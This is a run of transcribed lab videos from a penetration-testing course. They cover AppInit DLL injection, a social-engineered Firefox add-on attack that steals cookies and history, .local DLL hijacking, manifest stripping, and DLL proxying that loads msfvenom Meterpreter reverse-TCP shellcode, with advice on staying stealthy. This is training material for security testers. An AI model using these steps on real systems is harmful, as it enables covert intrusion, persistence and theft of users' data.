and then enable load app in DLLs. There we go. Now let's actually run some tests. Let me first run IE. It's a user mode application, and what you would actually see is that, well, IE loads and there is no run DLL32 or anything like that loading in here. Okay, now let's run Notepad. We do notice something happening in here, and if we go down, we'll see a run DLL32 was started under Notepad, and we can verify we have a session. And similarly, if I go back here and start calculator, you would again find that a run DLL32 was started. And if we go back in here, here is our second Meterpreter session. Now if I start anything else, let's say sticky notes, right, you'd actually see that no run DLL32 is actually started under it, right? And this is how we can very simply ensure that we are a little bit more stealthy. However, keep in mind that in each of these new processes which are invoked, AppInject v2.dll is present in all of them, right? And this is super important, right? It's even present inside run DLL32, but doesn't do anything in there. But the DLL itself is going to be present pretty much in all the binaries which are invoked. So hopefully you enjoyed this video, and if you have, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pen Testing series at Pentester Academy. Now in this video, we will look at other interesting client-side attacks, which include the Firefox add-on attack. So this is a very interesting attack in which one can use social engineering to have a victim install a Firefox add-on. The more convincing the name, highly the likelihood of the victim going ahead and installing it. Now the best way to couple this is with honeypot APs, DNS hijacking and ARP-based hijacking, where let's say the user types in a URL and you basically redirect them to your site and serve the add-on, so that makes it look as if they are on the legitimate site. And if you force HTTP along with DNS based hijacking, for all practical purposes, most victims would never notice anything fishy. Okay, so we are going to use Metasploit again. It has the built-in Firefox add-on attack. So let's jump right in. Here is my console. I'm going to do a quick search for Firefox_XPI. And here is my Firefox which is running here. I'm running both of them inside VMware and projecting the terminals using VMware Unity. Okay, so let's go ahead, select this, paste it. Let's look at different options. Now the add-on name is important. So let's set add-on name to Firefox update, rather Firefox security updater, right? Apart from this, let's go ahead and also set the URI path. This makes it easy for us. URI path would be root, and let's set the SRV port to be 80. Right, now let's hit exploit. So the handler is up and running. The IP address seems to be different from what I would want, so let me just stop the jobs real quick and let's set the payload, because I have multiple interfaces. That's the reason I'd like to set the payload. Let's use Firefox shell reverse TCP, show options, set lhost to 192.168.10.10. This is my other interface, which is facing the vulnerable machine, the Windows 7 machine on which I'm running Firefox. Okay, so now let's visit the malicious page. So I can go in 192.168.10.10. If you notice, it immediately tells me an add-on needs to be installed. Let's go ahead, click on that, and it says Firefox security updater. Interesting. Let's hit install now, and we have a command shell which is opened. Now let's use some post-exploitation modules with this, right? So let's use post Firefox, and then you have a bunch of options. Let's use, let's say, cookies to begin with. Firefox gather cookies. Let's look at options. We need to set the session here, of course. So let's set the session to 1, right, which is basically the number here, the ID there. And now let's hit exploit. And if you notice, it says save 10 cookies to this location. Let's copy this out, and in a new tab, let's view this. So we see a bunch of cookies in here. Unfortunately, everything looks base 64 encoded. So the first cookie, let me copy the host, and you can use a base 64 decoder. And there you go. This is for .google.com. This is the name of the cookie. And of course, you can automate all of this using a little bit of scripting, right? Pref or the preference cookie. Let's go back in here. Let's pick up the cookie value. And there you go. As you can clearly see, we are able to now figure out different cookies. Now we could go back in there and say you want to use something else, right? Let's say the history to all the places we've been to. Let's look at the options. Need to set the option again. Hit exploit, and it says the history has been saved as well. So let's copy this out, paste it, and we can clearly see the history. We've gone to the Firefox page, we've gone to 192.168.10.10 8080, and we've also gone to 192.168.10.10. Interesting, right? And of course, a real life pen test, you would get much more data out of this. And last but not the least, one of the other good options is also the passwords, right? Unfortunately, at this point, we haven't stored anything, but if we had, then we would see the passwords as well. In a previous video, I talked about the passwords and how to use different tools to crack them in case they are encrypted and all of that stuff. please look back in the network pen testing series to find them. Fantastic. So this is a very interesting attack, a little unconventional per se, is that most users might not have seen an XPI based attack. And a lot of websites actually even have their custom XPIs, which they force you to install. And you can just imagine what they could do once such an installation happens. So that's all I had in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pen testing series at Pentester Academy. Now we've looked at DLL hijacking. We'll look at an interesting case where using a .local file we can go ahead and hijack DLLs from applications which might even have hard-coded DLL addresses on the system. So what is the .local file? Well, interestingly, Microsoft has created this provision where if you create a file or a directory with the app name .local, then this forces the DLL search to begin with the current application directory and also inside the directory with the .local extension if you've created that instead of the file. So to give you an example, if we have abc.exe and there is an abc.exe.local file present in the same directory, then as soon as this is executed, the DLL search order will begin from the current directory. Now you're probably thinking, hey, isn't this something which is already happening? Yes, it is, but here is an interesting twist. Even if abc.exe has hard-coded DLL addresses, let's say C drive Windows avc.dll, even then that DLL would first be searched in the current applications directory before it tries to go to the other hard-coded location. Now you can also create a directory with the same name, let's say abc.exe.local, and if you do that, then that directory is searched as well for the DLL the application would like to load. Now only DLLs which are exempt are what are called the known DLLs, which are available in this location, which we'll have a look at a little later. So let's jump right into the demo. Now here is what I've done. I've created a simple application and let's see what this does. Now this application tries to load a DLL from C drive Windows demo.dll, right? Now note that I have hard-coded the DLL address. So in this case, load library should try to load it directly from here rather than searching in the current directory. So let's go ahead and test this hypothesis out. So I'm going to go ahead and compile this. So the build has succeeded. Now let's do the following. I'm using VMware Unity. Let me open up my documents. Let's go to desktop and I'm going to run sysinternals tool suite, and inside that I'm going to run procmon. Let me reset all the filters, and procmon is now monitoring everything. In the meantime, let me also go inside the Visual Studio directory to projects, to DLL searcher. That's really the name of this project, as you can clearly see here. You don't need the source code. I'll be giving you the binaries which you can download from below the video. And I'm going to go to the debug directory. Let me remove this which I had created before. Now here is DLL searcher, right? So if I run this program, it says could not load DLL because there is no demo.dll in C drive Windows at this point, which is okay. Now if I go back to process monitor and add a filter, and I say the process name is DLL search, let's add this, apply, and the result is name not found. Now if you're confused about why I'm doing all of this, go back in the series and look at the DLL hijacking videos to understand what is happening. Here we are, and the last of course is I'm just interested in the list of DLLs in here, right? So I'm going to go ahead and look at them. So I'm going to say result, or rather path, ends with .dll. So here we are. A lot of DLLs are being searched in here, so you can clearly see. But if you notice demo.dll, because it's a hard-coded address, as in the program here, is only searched in one single location, which is C drive Windows demo.dll. Fantastic. Now let's go ahead and clear this. I'm going to go back to this directory. Now let's create a new directory in here. You could even do a file, but I'm going to create a directory. Have the same name, DLL searcher, and then .exe.local. Now let's launch this. Let's go back in here. Now, do you notice something? All the searches are first happening in the DLL searcher.exe.local directory. Now, if you've looked at DLL hijacking, this is pretty much great, right? But we would want also that demo.dll should be searched in the current directory and inside this directory, right? Keep in mind demo.dll is hard coded. But now if you notice, we see that demo.dll, even though it's hard coded, was searched inside the DLL searcher.exe.local directory and also in the application's current directory, right? This wasn't happening before. And then finally, we search for the hard coded location C drive Windows demo.dll. Fantastic, right? So now let's go ahead and clear this up. Let me open up a new project. Let's close this solution. And I'm going to open up a project which I've already created. This one is called demo DLL. Okay. So this is really just a very simple DLL. The moment a process loads this inside of DLL main, I pop up a message box with I am the bad DLL, right? So let me go ahead and compile this. It's done. I can go back in here to the projects directory, go to demo DLL, go to the debug directory, pick up demo DLL.dll, go back to DLL searcher, debug, and now inside this, my mistake. Let me put this DLL. I'm going to call this demo.dll, right? Awesome. Now let's run this program. And there you go. the DLL was loaded from inside the directory. I am the bad DLL. Fantastic, right? And keep in mind that this location will take precedence over even the hard-coded address in the DLL. And this is huge if you think about it, right? Because unlike in the previous case where of course the application's current directory is checked, but this does not happen in the case where DLL paths are hard-coded. When DLL paths are hard-coded, the binary would typically ignore the application's current directory. Now, the known DLLs part, keep in mind that according to the MSDN documentation, DLLs which are listed in known DLLs cannot be loaded in this way. So you can see the list. You could go here and we can run regedit. And the location is basically under HKey local machine, system, control, and under control if you go down, the session manager, and basically under the session manager you have known DLLs, right? And keep in mind that the system32 and the syswow64 directories seem to be both included inside of this, right? So these are supposedly exempt. I haven't tested it. You can try it out and see if that's really the case. But typically it's always good to kind of keep the system DLLs aside, right? And focus more on the application's DLL to go ahead and do these attacks. Now, there is one more thing which you need to keep in mind, which is while doing this, if the application has a manifest file embedded in it, then the manifest file takes precedence. And if this DLL redirection isn't mentioned in the manifest file through probably an assembly declaration or something, then this wouldn't work, right? So let me give you an example. Now, let's close this project and let me go back to my previous project. Now, one of the things which I had done, if I go to the Properties tab, under linker manifest file, you would actually note that the generate manifest is set to no, right? Now, if I actually set the manifest to yes, click OK, let's delete the binary, the existing one, and let me recreate it by recompiling. Go back. Here it is. Now, when I run this, you'll actually see that the DLL could not be loaded again, right? Because the manifest file is actually taking precedence. So you would need to ensure that you would strip the manifest file or modify it in order to allow this redirection to happen in the .local directory or in the current directory if you use a .local file, right? Name.local. So keep this in mind. This is important. A lot of people online seem to complain that this redirection doesn't work, but what they're forgetting is that the manifest file takes precedence over the .local redirection file or directory. In the next video, I'll show you how to read the manifest file and to remove it from the binary so that this would continue to work. Fantastic. So hope you enjoyed this video. One of the other things I wanted to touch before I end is that you could pretty much make any binary vulnerable to this kind of a hijacking attack, even if it has hard-coded DLL paths inside of it. And this makes this a very potent attack during a post-exploitation phase for privilege escalation. Also, it's very is easy to distribute this over P2B, host a malicious website, or do social engineering, or even hijack communications and drop a little binary update of some kind through Firefox or something during your pen tests. Well, so that's all I had in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pen testing series at Pentester Academy. Now, in the last video, we saw that the .local file allows us to have the operating system search for the DLL within the .local directory, even for hard-coded DLL paths. Now, we saw that unfortunately, when a binary has manifest files, the manifest file declarations take precedence, and if there is no declaration regarding an assembly for redirection, then the redirection fails. Now, one of the easy ways in post-exploitation when you're targeting a binary for privilege escalation might also be to strip the manifest files from the binary, right? So how can we go ahead and do this? Now, the first step, of course, is to look at the manifest file look at the binary and even see if there is a manifest file or not. So let's actually go to our demo. Now I'm going to compile this binary with manifest files. So this says generate manifest, it says no. I'm going to set this to yes. I'm going to rebuild the application. Let's go to the application directory. Now you have to watch the last video to make sense of what this directory is and the little demo DLL inside and everything, right? So please watch the last video before we move further in case you haven't. Now what you would notice is with the manifest file, well, the redirection doesn't happen into the directory and the DLL does not get loaded, right? So let's actually use PEView to look at this file. So let me go ahead and open up PEView stored on the desktop. Keep in mind I'm actually using VMware Unity. So basically all of these windows are running inside of my VM. Should I just put this in here? I did. Sometimes the drag and drop can be a bit of a pain. Goodness. Okay, I'm just going to go ahead and select this through the open because I'm so bad at dragging and dropping stuff. So let's go to the debug directory, open up the binary. Let's go full screen. Here it is. Now, what you would actually notice is there are, of course, different sections, and under the RSRC or the resource section, you would actually find something called the manifest. Can you see that? We can clearly see this is the XML in here, which is the manifest. So this definitely has a manifest file. We can even select the whole binary and scroll somewhere to the very end to locate the manifest file. Here it is. Now if you wanted to view the manifest file in a slightly more structured way, you could use tools like Resource Tuner, right? You can download it from here. They have a 30-day eval which you can try out. So I go back in here, I can right click. I've already installed Resource Tuner. So here is the manifest section. select it, I can clearly see XML. Seems to be almost like a default manifest, really nothing great. Execution level as invoker, UI access false, right? Probably because this is a console application, and there is really nothing more in here. So this is the reason why the redirection using the .local file fails. So this is what I'm going to do. I'm going to select the manifest file, or rather the manifest section, and click delete resource here, and then go up here and save it on the original file. So if you notice, it saves new file saved as. It pretty much overwrote the existing file, and we can try. Also backed it up, by the way, backed up the original file. You can open this one in Resource Tuner. Actually see there is no manifest section. I could try and open this up in PE view as well. Right, and what you'd find is in the resource section we do not have a manifest file this time around. Now when we go back in here, and now I execute this, there you go. If you notice, the .local redirection works perfectly, right? Now you can search and use this as an exercise to look at how to modify the manifest file in order to allow the .local redirection. You can check that. You'll notice you might have to probably declare an assembly and kind of wrap it, wrap the specific DLL inside of it and stuff like that. So have a look, see if you can solve it by modifying the manifest file. But honestly, if your manifest file does not have anything very important like greater privileges or something required, you can pretty much just get away by deleting the manifest file itself. Right? Great. So hopefully you enjoyed this video, and if you have, please do recommend Pen Tester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pen Tester Academy. Now in this video, we will look at another very interesting concept called DLL forwarding. Now before we look at actual DLL forwarding and how it can help us from a pen testing perspective, let's understand how imports work in a binary. So in a typical Windows application, as we've discussed before, the application would depend on system DLLs or application DLLs to go ahead and run various functionalities. Now typically when the application is run, the Windows loader looks at the application's import table, figures out which DLLs need to be loaded, loads all of them up, fixes the IAT, and after that allows the application to run. Now what is DLL forwarding and later on, as we shall see, proxying? Well, what if the attacker could actually go ahead and replace one of the system DLLs or the application DLLs with his own and have the application first call his DLL, and the attacker can then run his malicious code and after that forward the actual request to the real DLL, which would go ahead and run whatever function the application requests. So as an example, let's say the application might require, as an example, user32 maybe to run message box A, right, which basically pops up a message box. Now the attacker can create his own user32.dll, which in turn goes ahead and forwards all requests to the real user32, which he would of course end up renaming as, let's say, user 33 or user 34 or anything else for that matter. And when the application requires message box A to be run, then the attacker DLL is what is invoked, and it can do any malicious tasks it wants before fulfilling the actual request. So you can download PEView and CFF Explorer, and with this we will go ahead and look at some binaries. Now I've created a very simple Windows program, as you can see, and all this does is pops a message box which says hello world. So if I were to run this, you'd actually see the hello world message box, right? Now let's actually look at this binary using PEView first. So let's go inside projects, console application 2, debug, here it is. Let's open this up, and we would find that there is really an iData section in here. You can go ahead and click this, and inside that let's look at the import directory table first, right? The directory table, well, basically tells us which DLLs are actually being imported. So we see user 32, we see MSVCR, we see kernel 32. Now when we go to the import address table, you will actually find the functions or the procedures which are called from that DLL. So if I scroll down, for the current binary which just pops a message box, we can clearly see message box A is imported from user32.dll, right? Now keep in mind, the more I would say complicated the binary, you would find a ton of imports just based on that. Now PEView unfortunately can only look at 32-bit binaries. If you wanted to look at 64-bit binaries, a good tool would actually be CFF Explorer. So let's say we can go to my computer, C drive, Windows, system 32, and then let's say we'd like to open Notepad, and here we go. We would actually find this is a 64-bit binary. We can clearly see that. We can go to the import directory, and you'll find many DLLs being imported. Now you can also click on something called the dependency walker, and what this does is for every DLL which is loaded, it also tells you about other DLLs which in turn get loaded automatically because this DLL depends on all of these, right? So here is user 32. We clearly see this depends on NTDLL, GDI 32 and kernel 32, right? So which means if you try to load user 32, the loader will ensure that these DLLs are loaded as well because we need them in turn. And you could actually go ahead and do a lot more interesting stuff with this tool. So have a look at it. Now, what have we understood? We've understood that given any DLL, any system DLL or application DLL, these DLLs export what are called different functions or procedures which are used by binaries, which in turn import them, right? Fantastic. So that's all I had in mind for this video. In the next video, we will go and look at how to read a DLL export table programmatically using PE file for better understanding. So hopefully you guys enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we are going to go ahead and jump deeper into how to do DLL forwarding by looking at how we can dump the exports from a DLL. Now the first thing we'll do is we'll install the MingV compiler, both 32 and 64-bit. So let's jump right in. Now I'm on a Kali 109 machine and I've already installed this, so please ensure you do the same as well. Now after this, in order to dump the export table, we are going to use PEFile, which is a Python library which supports both 32 and 64 PE executables and DLLs. Now you all know we love Python at Pentester Academy, and the best part is that the sample code on PEFile's website itself solves pretty much everything we would want to do in this section. So here is what I've done. I've already downloaded PEFile from the URL which I've provided. Let me untar it. Go inside the directory, and then you can actually do a python setup.py install. Now let's write our script. Let's call it DLL export dump.py. You can type along with me, it's a very short script. So now let's import the sys module and the PEFile module. Right, now the next thing which we're going to do is take the DLL name as input. So I'm going to say DLL name equals sys.argv1. Right, now let's go to PEFile's documentation. It's very simple, PE equal to PEFile.pe. So PE equals PEFile.pe, and then we give it the DLL path. Now what we really want to do is dump the export table. Now PEFile makes this very easy. If you actually scroll down in here, what you would find that the list of exported symbols can be dumped using this code snippet. Now of course, this is of course the list of imported symbols, my mistake, and instead of the imported symbols we actually are looking for the export part, right, which is in here. Now of course we will have to ensure that there is an export table available, and this would need to be checked first. So I can go in here and say, hey, if, right, and we are going to use something which many of you may be familiar with in Python, has attr or has attribute. We say, okay, does this have an attribute directory entry export, right? This is not the case, then let's just go ahead and print no export table. Is this a DLL? And then exit the program because there is really nothing much to do. Now if it has an export directory, then all we have to do is copy this code snippet out, paste it in here, and then we're going to paste this part as well here. There we go. Now this should go ahead and pretty much dump the export table. So let's try this out. Now, of course, we need a DLL for all of this. So I'm going to go inside C drive, Windows. Let's use a 32-bit DLL. I'm on a 64-bit system, so all the 32-bit DLLs are under syswow64. And in here, let's actually search for user32. Here it is. Let me copy this out, paste it inside the directory, refresh the directory, go back in here, then run DLL export dump.py. Okay, let's actually fix this real quick. This should actually have been within quotes. How to give the attribute name. And there we go, right? So we can clearly see all of the exported procedures, right, along with some interesting info in here. So you can see there are a ton of exported procedures, of course. So if I go back in here, you'll actually find the very first, of course, is the address of where this is located, which isn't important from our perspective. The second is the procedure name, and third is the procedure ordinal, right? Think of the ordinal as like a number which also uniquely defines the procedure within the DLL. And if you see the output, there are a couple of procedures in here which do not have a name associated with them, but definitely have an ordinal, right? This is also something which is very, very normal in Windows DLLs, where you would find them being defined by just the ordinal and have no name. So let's actually remove the clutter a bit. I'm not interested in the address. I'm only interested in the name and the ordinal. There you go. Fantastic. Now, this is what I had in mind for this video. Try this out yourself. In the next video, we will look at how to create a hijack DLL based on all of this information which we have retrieved. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pen Testing series at Pentester Academy. Now in this video, we will look at how to create the hijack DLL as part of DLL forwarding basics. So let's jump right in. Now before we begin creating our DLL, excuse me, let's look at the export table of a system DLL and try and understand a little bit more about it. So I'm going to go inside C drive Windows syswow64. I'm on a 64-bit system, and right now I'm planning to just look at a 32-bit DLL, which are all located in this directory. And I'm going to use PEview, I'm sorry. Now I can clearly see the export address table in here. And now, as we spoke about maybe a couple of videos back, DLLs basically export different procedures or functions which other code in the program can call and leverage. Now DLLs export functions either by name or ordinal. Now what you would actually see is a lot of these functions like activate keyboard layout, add clipboard format listener, etc. are exported by name, and you would find that some of them do not have any name, which implies they are exported by ordinal. What is ordinal? Well, very simply put, it's a unique number within the DLL which is assigned for a given procedure. So if you look at this column, you'll actually find that this value differs for every export, and this is basically the ordinal. And the first two functions clearly have been exported by the ordinals 05DC and 05DD. Right? Fantastic. Now, how does function forwarding work? Well, a lot of times a DLL may not implement the function it is exporting. Rather, that function may reside in another DLL which it can reference. So basically, let's say I have a function ABC. I can say, hey, ABC actually resides in NTDLL. Go pick it up from there. Now, this is a very common practice, and even system DLLs do function forwarding. So let's go back, and if I look at user 32 and keep scrolling down, you'll actually find these four entries interesting. Now if you notice, this is forwarded name, right? So def dlg proc a is really forwarded to ntdll.ntdll dialog wnd proc a. Now ntdll is another DLL, and basically what user 32 says is, hey, if you come to me looking for def dlg proc a, load up ntdll and access it at the function ntdll dialog wnd proc underscore a, right? So the format basically is the new DLL dot name of the procedure. Now, as you can clearly see, the name of the procedure in the new DLL might be completely different than the one which is put in the original DLL, right? There is no compulsion that the names have to match. So how does the loader work in this case? Well, it would go ahead, first load up user 32, and if the program goes ahead and uses def dlg proc w, it would go ahead and load ntdll, and it would now know that this is the address to call if this function is referenced. So how are we going to orchestrate this DLL man-in-the-middle attack, right? How do we put in our proxy DLL in between? So this is what we are going to do. Step 1, we are going to take the real user32.dll and go ahead and export all the procedures by name or ordinal. Now after that, we are going to go ahead and create a proxy DLL, and this DLL basically would have an export table in which pretty much all the names of the procedures would be identical to the real DLL. However, these would be forwarding entries which would eventually invoke the right code from the real DLL. Now keep in mind, the application will not invoke our proxy DLL automatically, and the only way we can do that is rename it as the real DLL. So let's say we want to proxy user32.dll, then I'm going to create a new DLL called user32.dll, which would contain function forwards to the real user32, which is now going to be renamed to something else, right? So in summary, export all functions by name and or ordinal from the real DLL, create a def file which is going to be used by the linker to create a new DLL, which really is nothing but a function forwarder to the real DLL, which has now been renamed to something else. The loader will load our new DLL, which is basically nothing but the in-between proxy. And once it goes through the entries, it will load the real DLL, which we have now renamed. So let's go ahead and first create a def file with all the function forwarding entries. Now, if you recall, in the last video, we had created DLL export dump.py, in which we just showed all the export information from a given DLL by name and or ordinal. Now what we are going to do is create a def file, and this def file will be understood by our linker LD, that this basically contains the function forwarders. So what is the format? Well, library followed by the library name. Then we have the export section, in which we are going to go ahead and put the forwarders. So let me show you how this is done. Let's first analyze the output. So the DLL to use is user32.dll. And of course, because we are creating a proxy with the same name, the output file eventually for the DLL binary would be the same. Right now, as far as the definition files are concerned, we may always use a different name. But keep in mind that in the function forwarder, the new DLL name needs to be mentioned. So let's call this user32_real.dll. Let's do a less so that we can see the output. There we go. So this says, well, the library in question is user32_real. Here is the export section. And if you're trying to go ahead and access activate keyboard layout, then go to user32_real and then pick up the same function. And we've also given the ordinal for more input. And at the very end, of course, you have a couple of exports which are there by ordinal only. It was a bit of a pain to figure out the linker options. I've tested it with names. I think the ordinal part works as well, but you can try it out on your own just to verify. Now let's actually put this inside template.def. And now if I open my template.def, here is a beautiful def file which now our linker can use to create the proxy DLL. Now, of course, to create the proxy DLL, we will have to have some DLL template code and all that written. What we will do is we'll split up this video into two, and I think this is all I had in mind to discuss for this video. In the next video, we will look at how to create our proxy DLL using a DLL template code. Well, that's all for this video, guys. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pentesting series at Pentester Academy. Now in this video, we will look at part 2 of the hijack DLL using function forwarding, which we've seen in the last video. Okay, so now we basically have created a DLL def file, but we need some basic DLL template code with which we can create one. So I've pretty much used the most bare bone DLL template code which we will require, which just contains DLL main, right? And this default template code was picked up by what Visual Studio has created. It's pretty standard, and you'll probably see it almost pretty much everywhere wherever a DLL program has been written. So now let me go back, and I have my DLL template. So here is my DLL template.c, the same code which we just talked about. I have my template.def. You can clearly see the library in question is basically forwarding everything to user32.real. One of the things which we need to keep in mind is the library name itself here. This is one small typo which we did, needs to be user32, which is the actual library we are creating. So you can fix this as well as the export dump.py. This would just be the DLL name. Something happened. We don't need the .dll from what I recall, so we could just remove it. Now I can go back and generate the dump again. Open up template.def, and this looks good. Now let's create user32.dll with all of this information. I'm creating a 32-bit one. I'm going to use GCC. This is the MingW version of GCC, by the way. And then we give the DLL template.c. The output would be user32.dll. And after that, we basically have to say this is a shared library. And we also give the template.def, which the linker would use. So now if we do a file user32.dll, you would find it is a p32dll. Fantastic. Now let's go to the Windows machine. And let me refresh this page. Here we are. And here is what I'm going to do. Let me close this one. Let me open up this user32 with pconf. And let me go into the export address table, and there you go. You can clearly see that everything now is being forwarded to user32_real blah blah blah, right? You might have to check out the one with the ordinals, as I mentioned in the last video. I haven't tested it with the ordinals. I've tested it with the function names, and the forwarding just works fine, right? Till the time the ordinal numbers are correct, which I verified that it is, I don't expect a problem, but just so you know, I haven't tested with only ordinals. Okay, fantastic. Now, let's actually go to our vulnerable program. So I have a console application here, and all this does is puts out hello world. So now let's initiate a DLL hijack for this one. Now there are various ways. In the real world, you would probably go ahead and create either a .local redirection, or the application may be vulnerable. We've spent a lot of time on DLL hijacking and how to go about it with different techniques. So I would go ahead and leave that to you as an exercise. So I'm going to be using the .local redirection. I've already created the folder. And now let me copy the user32.dll we've just created. This is of course the fake one, which has been renamed as user32. Now if I go back in here and start the app, you would notice this says the procedure entry point user32_real.message box A could not be located inside blah blah blah, right? And this is simply because user32_real at this point does not exist in the same directory. So I'm going to go inside and let me actually copy user32 out from the system directory, and let me paste it inside the same directory. And now let me call this user32_real. Now I can go back in here, run the app, and there you go. Hello world works perfectly, right? Now, just so we know that definitely both the DLLs have been loaded, once we run this application, let me actually go and run the sysinternals tool suite as well. Let's run Process Explorer and let's look at all the loaded DLLs. So here is console application 2. If I select that, I can see a lot of these loaded modules. And here you go. If you scroll down, you'll actually see that user32.dll and user32_real.dll, both of these have been loaded by the application. Fantastic, right? So this is how we can actually create a proxy DLL and go about hijacking the functionality, right? Now you could pretty much even write a little API spy which looks at what data the application is sending, the API you have hooked in this way, logs something and then forwards it to the real one. There are a lot of interesting things which can be done from this point. But from our perspective, all I would want to do is have my DLL get invoked, and so that I can do interesting things in DLL main, and for everything else let the real DLL take care of it so that there is no loss of functionality. So you've seen how we are able to do this. In the next video, we will see how we can get Meterpreter using this technique. I'm sure something everyone has been waiting for. So that's all for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pen testing series at Pentester Academy. Now in this video, we will continue with DLL forwarding, and what we will look at is how can we get Meterpreter using this. So why Meterpreter? Well, of course, it's our favorite way to go ahead and access a system. But keep in mind that we have already looked at the Metasploit DLL hijacker in previous videos, in which we got Meterpreter using DLL hijacking. Now, why is that not a preferred technique, at least in my humble opinion? The simple reason is that Metasploit replaces the original DLL with its own, as we saw in a previous video. This unfortunately goes ahead and causes a lot of problems, right? Including the fact that the original program can now no longer run normally simply because it probably isn't able to get the functions it required from the DLL. Now this can cause the program to either exit, hang, or eventually crash. This is great for a POC, but not so great for the real world, where you probably want your presence to be totally undetectable. Now, how do we fix these problems? So here is what we are going to do. We'll take the Metasploit's DLL template, but ensure that we add function forwarding to it to the real DLL for all the exported functions. Now, apart from that, Metasploit's DLL main eventually calls exit thread, which is a problem as well. We're going to remove that from the program, and both of these would allow the original binary to run without any problems. Now from previous videos, you already know where to pick up the Meterpreter DLL templates from. This is basically the GitHub account of Metasploit. So this is really the page. I have given you the link. Now, if any of this does not make any sense, watch the previous videos. I've talked in depth about the template and how modifications can happen. Now I'm taking the raw version of the template. Just going to copy this out. Go to my Kali machine. Let's see if I have internet connectivity. I do, so I'm just going to do a quick wget for template.c, and then similarly for template.h. Now from a previous run, I already have template.def for user32, right? In the last couple of videos, we've seen how to create this. So go back and have a look if you have any confusions. I don't want to repeat that part. Now I'm going to open template.c to remove some lines which we do not require. Now if you recall what I said, that I do not want exit thread to happen, right? So here is the exit thread. I'm going to remove this. Also, we are going to build this for a 32-bit mode, so let's remove all of these if defs for the time being, just so that nobody gets confused when reading this. Okay. Now, what we will have to do is populate template.h with the shell code. Now we can do this very easily. Let's open a tab and let's do an msf venom -p Windows Meterpreter reverse TCP lhost, the attacker IP 192.168.10.10 and lport equals 9000. The output format would be C. There we go. So let's copy this and let's paste it here. Oops. Something wrong with the SC size. I think it got deleted. Let's quickly go back here and look at the value. I think it was 2048. This is probably during my cut paste something happened. Okay. I'm just going to actually quickly go back and add the exit thread just so you know what really ends up happening because of it. And then we will remove it eventually, right? So I'm just going to add this once again. It's important we understand the problems rather than look at the solution immediately. So right now, here is what I'm going to do, just like what I've done in a previous video. I'm just going to take template.c and create a DLL out of it. And this time around, there is no function forwarding, right? So template.dll, here it is. Now let's go to our Windows machine. Let's go to the directory. Let's look at which directory this is. DLL forwarder 32, that's the directory. Let's go in here, right? And now if I take my template and open this up with PE view, you'll actually notice that in the export address table, we do not have any of the function forwarding happening, right? Okay, let's close this. Now let me set up Metasploit. So use exploit multi-handler, set payload to Windows Meterpreter reverse TCP, set well host to 192.168.10.10. My mistake. Set lport to 9000. Let's receive multiple sessions on this. So let's set exit on session to false and then hit an exploit -J to run the job as a background job. Fantastic. So now our handler is ready and waiting. Now this first DLL, of course, is the base DLL which we created using Metasploit's code. Really no modification. All we've done is we've added this shell code inside of it, right? So if I go back to the attacker machine, the victim machine, I can copy out template.dll, and if you look at the last video, you'll actually find console application 2 and all of that stuff, and the redirection directory and everything. So have a look at it. I don't want to repeat all the nitty-gritty details again, or else the video time would be very high. User 32. I have renamed this. This is the real user 32, right? So now if I go back here, run this, right, you would actually see basically this says message box could not be located, blah blah blah, right? Of course, just as expected, right? And nothing pretty much ends up happening, right? Now if we instead go ahead and add the template.def, and let's go ahead and create this as, let's call this actually template 2. Now if we go back in here and look at template 2 using PEview, we go to the export address table. There you go. We can clearly see all the forwards in there just as we needed it. So now I'm going to copy template 2, go back in here, I'm going to delete this, I'm going to copy template 2, and I'm going to rename template 2 to user 32. Now I'm going back here. Now let's run the application. Notice nothing happens. I don't see my hello world, nothing. But I have a Meterpreter session, of course. Right, and if you recall from previous videos, I am now running inside run DLL 32. So here it is. Here is where I'm running. And you can even verify this on the attacker machine by starting something like Process Explorer, and you should be able to see your run DLL in here. Right, there you go. Right, and if we look at the list of the loaded DLLs, you would be able to find all of them, and this is really where our shell code is running at this point, right? Just as we've seen in the last video. Now, unfortunately, the problem, as you can clearly see, is that the program exits, right? So if I were to now basically go back, open up template.c and remove the exit thread line, save this, recompile this to template3.dll, and let's actually exit this Meterpreter session. And now I can go copy template3, delete this one, copy template3, rename this to user 32. Now I go back in here, run the application, and there you go. The application runs perfectly fine. If I go back in here, I'll actually see I have my Meterpreter session as well. right? Awesome. And if I use Process Explorer, I would actually find that console application 2.exe has spawned a run DLL32, right? And console application 2.exe, if we go and look at all the DLLs, would have our user32.dll loaded as well as user32 underscore real.dll loaded, right? So now all the calls which this program requires is being forwarded to user32 underscore real.dll. And this is how now the program functionality is perfectly intact. Everything is working fine. And we could click on OK. The program exits, but run DLL32 still remains. And we have our Meterpreter session, right? Fantastic. So this is how we can go ahead, make small modifications along with DLL forwarding and ensure that in a DLL hijack case, the original program continues to run and function normally rather than the program hanging, exiting, or crashing just because we ended up hijacking a DLL and the program could not get the necessary functionality it needed to run. Awesome. So hopefully you enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pen Testing series at Pentester Academy. Now in the last video, I showed you how to get a 32-bit Meterpreter using DLL forwarding. Now in this video, we will look at 64-bit processes and 64-bit DLL forwarding. Now in reality, it isn't any different at all. The good news for us is that PE file supports 64-bit out of the box, and hence we can use our previous script for this demo as well. Now what would be the procedure? Well, the process would involve copying the 64-bit user32 from the C drive Windows System 32 folder, right? Or whichever DLL you would like to hijack into our working directory, and then to run our script to generate the template.def file, which will contain all the exports of user32 or whichever DLL you want, and those would be forwarded to a new DLL. Now after this, we would modify the Meterpreter DLL template for 64-bit, ensuring we have the right context as well as the right shellcode. So let's jump right in. Let's go step by step. Now we could go inside my computer, C drive, Windows, scroll down to System 32. This is where all the 64-bit DLLs 